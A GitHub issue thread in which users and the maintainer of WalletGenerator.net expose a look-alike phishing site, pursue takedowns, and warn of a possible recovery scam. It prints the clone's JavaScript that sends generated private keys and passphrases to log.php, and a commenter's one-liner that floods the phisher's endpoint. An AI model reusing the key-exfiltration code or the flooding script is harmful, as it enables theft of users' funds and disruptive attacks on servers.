Name squatting with phishing at walletgenerator.org

[Khaezzar]

Hi, there is your web at walletgenerator.net but there is an other at walletgenerator.org . It is unclear where is the true one and it s hard to not do mistakwe when looking for your web from google. Do you think to add a message in your web page and a signed (sha256sum) file ? Can other sites like Dogecoin.com tell about it in their paper-wallet ? This will legitimate your hard work.

thanks for your time.

[MichaelMure]

Ho wow, that's fucking bad ! Thank you for reporting that.

IF YOU USED THIS WEBSITE, MOVE YOUR COINS ASAP !

You can find this kind of thing all over the source code:

var http = new XMLHttpRequest();
http.open("POST", "log.php", true);
http.send(generatedAddress + "," + Bitcoin.Base58.encode(encryptedKey) + "-" + document.currentBipPassphrase + "," + janin.selectedCurrency.name);

To be clear, this means that each time someone generate a wallet, the private key is send to the guy that host this copy and he can steal everything anytime later.

The domain was created 4 month ago: 2017-08-05

I'm not sure what to do about that ... I guess I should register all similar domain names but that just prevent the obvious name squatting, not everything. And this guy already have the domain ...

Anyway, the only legitimate source is https://walletgenerator.net or the Github repo here: https://github.com/MichaelMure/WalletGenerator.net/archive/master.zip

[MichaelMure]

I asked the hosting company (cronon.net) to take down the website and prevent him to access the database. Hopefully they are quick to act.

[Khaezzar]

thanks for your fast act.

[ghostface]

Feel free to spam him with crap Open Chrome webdeveloper tool and paste this into the javascript console to send crap every 1.5 seconds

function doit() { var http = new XMLHttpRequest(); http.open("POST", "log.php", true); http.send("F*CKYOU,VERYMUCH,Bitcoin"); setTimeout(doit,1500); }

doit();

[ghostface]

Seems to be gone or he blocked me "Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later."

[reinierkors]

Seems to be gone or he blocked me "Service Temporarily Unavailable

I've contacted the hoster and asked them to take it down.

[ghostface]

Seems to have worked then - good job!

[rterwedo]

You need to get the domain name removed... or he can just set it up again at a different host

[MichaelMure]

So .... the guy is back with the same domain and the same shitty code to steal private keys. Obviously the take down request didn't work. I had no reply whatsoever.

Any advise for a next step ?

[Extamov]

@MichaelMure I can use my private servers to take his website down by flooding his wallet logs With his shitty code

[MichaelMure]

@ExtendLord that might work but only temporarily ...

[MichaelMure]

I did it already 6 days ago, but can you all report the website to google as phishing ? https://safebrowsing.google.com/safebrowsing/report_phish/

[reinierkors]

Yeah.. the host won't take it down.

I've asked Cloudflare to take action.

[MichaelMure]

You should not login to your bank website without checking the SSL certificate, but that's still called phishing when someone build a copy. Nice bullshit ...

Thanks for trying

[Choms]

I'm kinda busy atm but you can contact the domain registrar: Registrar Abuse Contact Email: abuse-domains@cronon.net Registrar Abuse Contact Phone: +49.3039802410

or directly sourceWAY: Admin Phone: +49.15775728399 Admin Email: mail@sourceway.de

Cheers! PS: If you wanna seek legal prosecution you may want to first report him at your local police station, then have the cops issue a EU warrant asking the domain registrar (sourceway/cronon) for the details of the person who registered that domain.

[MichaelMure]

It returns a 500 error now. Win ?

[jameshamm]

In case you haven't noticed, the phishing site is back up, and still contains many segments of code which logs private keys and the currency associated with them.

It is probably worth pointing out that the numbering scheme (0 .. 5) on the steps to take (on your homepage) make it easy to remove the good advice. On the phishing site, there is no step 0, only 1 through 5, and it does not look like the site is missing anything. So if you change the numbering scheme, you could make it more awkward for the phisher to update their site (if they do at all). Other features it lacks are the range of translations, so it is quite easy to tell one site from the other.

[Thebys]

We need to put an end to this. Its like Marie Curie watching a shroom cloud everytime somebody generates a wallet there. Anyways, I have proactively bought the walletgenerator.eu domain and my request to redirect it to walletgenerator.net has just been processed. There are, however, still several lucrative variants vacant.

[MichaelMure]

Anyways, I have proactively bought the walletgenerator.eu domain and my request to redirect it to walletgenerator.net has just been processed.

Thank you

[crines]

Is this issue resolved?

Is the integrity of the walletgenerator from this repository working fine, without bugs or treat of private keys being extracted, if downloaded via this repository? Thanks

[stevesbrain]

@crines

Is the integrity of the walletgenerator from this repository working fine, without bugs or treat of private keys being extracted, if downloaded via this repository?

Yes - this issue only relates to someone "squatting" on a similar domain. This repository is unaffected by the issue mentioned here.

[admoseley]

WalletGenerator.org is still around. Searched the code and that same code that captures user's info is still there. Beware.

[jmg2485]

How about you return the 12 BTC your site stole from me???

[themotu]

How about you return the 12 BTC your site stole from me???

How did his site steal it?

[jmg2485]

I uploaded 12 BTC and the funds were almost immediately transferred to another account. This means they had saved the address and keys. Criminals. I’ve reported to FBI.

On Fri, Nov 20, 2020 at 12:38 AM, themotu notifications@github.com wrote:

How did his site steal it?

— You are receiving this because you commented. Reply to this email directly, view it on GitHub, or unsubscribe.

[stevesbrain]

Check the history - it's not the official site stealing them man, it's the phishing site with very similar domain.

[timoshc]

@jmg2485 I know some details about the guy who has stolen your bitcoins. Contact me, maybe we can do something together -Timothy.schield@gmx.ch

[stevesbrain]

@jmg2485

I know some details about the guy who has stolen your bitcoins. Contact me, maybe we can do something together -Timothy.schield@gmx.ch

No GitHub history? Shady proposition based off no information that could actually lead to you being able to do this? Smells like scam

[timoshc]

@jmg2485 I know some details about the guy who has stolen your bitcoins. Contact me, maybe we can do something together -Timothy.schield@gmx.ch

No GitHub history? Shady proposition based off no information that could actually lead to you being able to do this? Smells like scam

I got scammed myself (1.8 BTC) - I was in contact with @MichaelMure about this 6 months ago. And I will not post the personal information of this scammer in GitHub - what do you want to see as proof? So if @jmg2485 wants to try to get his btc (and I hope mine) back, he can contact me. If you don't believe me feel free..

[jmg2485]

I’m all ears. Yes I would like to know more. And if possible I will split the recovery of assets

Let me know how you’d like to proceed . Thank you.

On Sat, Jan 2, 2021 at 11:04 PM, timoshc notifications@github.com wrote:

@jmg2485 I know some details about the guy who has stolen your bitcoins. Contact me, maybe we can do something together -Timothy.schield@gmx.ch

No GitHub history? Shady proposition based off no information that could actually lead to you being able to do this? Smells like scam

I got scammed myself (1.8 BTC) - I was in contact with @MichaelMure about this 6 months ago. And I will not post the personal information of this scammer in GitHub - what do you want to see as proof? So if @jmg2485 wants to try to get his btc (and I hope mine) back, he can contact me. If you don't believe me feel free..

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or unsubscribe.

[Choms]

@jmg2485 don't fall for it, probably @timoshc is the scammer itself (come on dude, new github account and a gmx.ch email, you cannot raise more red flags).

If you (@timoshc) actually got robbed and got the offender's personal data, you should report it to the police and let them handle it, not try to form a group of "avengers" and do exactly what about it? It's also fairly simple to proof what you say (I have seen on other places you claim you actually went to the police), so just upload a picture of the complain you filled at the police station. Lastly, why wouldn't you post the scammer's personal data here if -supposedly- going to the police didn't achieve anything?

[timoshc]

I reported it to the local police, the file was closed after 3 months. I'm searching now for a person from canada (the scammers home country), who also got scammed. I will share my information with him, so he can report it to the Canadian police. Hopefully they can/will do more than.

I'm not sure what's your behavior of right, but here in germany it's illegal to dox private informations in the internet, even if it's a scammer - so I will not post any of his data here.

As I wrote bevor: If you don't believe me, you don't have to. Btw I don't know what's the problem with gmx.ch? It's a regular German/Swiss mailprovider.

[jmg2485]

Feds are already involved

On Sun, Jan 3, 2021 at 8:02 AM, Sergio Gonzalez notifications@github.com wrote:

@jmg2485 don't fall for it, probably @timoshc is the scammer itself (come on dude, new github account and a gmx.ch email, you cannot raise more red flags).

If you (@timoshc) actually got robbed and got the offender's personal data, you should report it to the police and let them handle it, not try to form a group of "avengers" and do exactly what about it? It's also fairly simple to proof what you say (I have seen on other places you claim you actually went to the police), so just upload a picture of the complain you filled at the police station. Lastly, why wouldn't you post the scammer's personal data here if -supposedly- going to the police didn't achieve anything?

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or unsubscribe.